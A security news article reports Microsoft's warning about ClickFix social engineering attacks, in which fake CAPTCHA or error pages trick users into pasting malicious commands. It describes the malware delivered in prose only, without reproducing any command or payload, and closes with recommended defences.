Microsoft Warns of ClickFix Attacks: Beware Copy-Paste Commands

Microsoft Warns of Sophisticated ClickFix Social Engineering Attacks

Microsoft has issued a critical warning about the growing threat of ClickFix social engineering attacks that manipulate users into executing malicious commands through copy-paste operations. The tech giant's security researchers have observed thousands of enterprise and consumer devices being compromised daily through this technique.

How ClickFix Attacks Work

ClickFix attacks begin with threat actors using phishing emails, malicious advertisements, or compromised websites to direct victims to deceptive landing pages. These pages typically display fake CAPTCHA verification prompts or error messages that appear legitimate, often impersonating trusted services like Google reCAPTCHA, Cloudflare Turnstile, or even Discord server verification.

When users attempt to "solve" these fake verification challenges, the malicious website automatically copies a dangerous command to their clipboard. The instructions then guide users to open Windows PowerShell or the Run dialog (Win+R) and paste the command, which immediately downloads and executes malware on their system.

Malware Payloads and Consequences

The attacks typically deliver information-stealing malware such as Lumma Stealer, Lampion, or Atomic macOS Stealer (AMOS), which can harvest sensitive credentials, browser cookies, cryptocurrency wallet information, and other valuable data. Some campaigns deploy remote access tools (RATs) like Xworm, AsyncRAT, or NetSupport, giving attackers complete control over compromised systems.

Microsoft's analysis reveals that these attacks are particularly effective because they bypass traditional security solutions by requiring human interaction. The malicious commands often use living-off-the-land binaries (LOLBins) and sophisticated obfuscation techniques to evade detection.

Multi-Platform Threat

While initially targeting Windows systems, ClickFix attacks have expanded to macOS and Linux platforms. The macOS variant, discovered in mid-2025, uses similar social engineering tactics but employs commands specifically designed for Unix-based systems to bypass security protections.

Protection and Mitigation Strategies

Microsoft recommends several defensive measures: organizations should block unnecessary use of the Run dialog, implement application control policies, and provide comprehensive security awareness training. Technical protections include enabling Microsoft Defender SmartScreen, network protection features, and PowerShell script block logging.

Users should be cautious about copying and pasting commands from unfamiliar websites and should verify the legitimacy of any verification prompts before interacting with them. Enterprise security teams should monitor RunMRU registry entries for suspicious command execution patterns.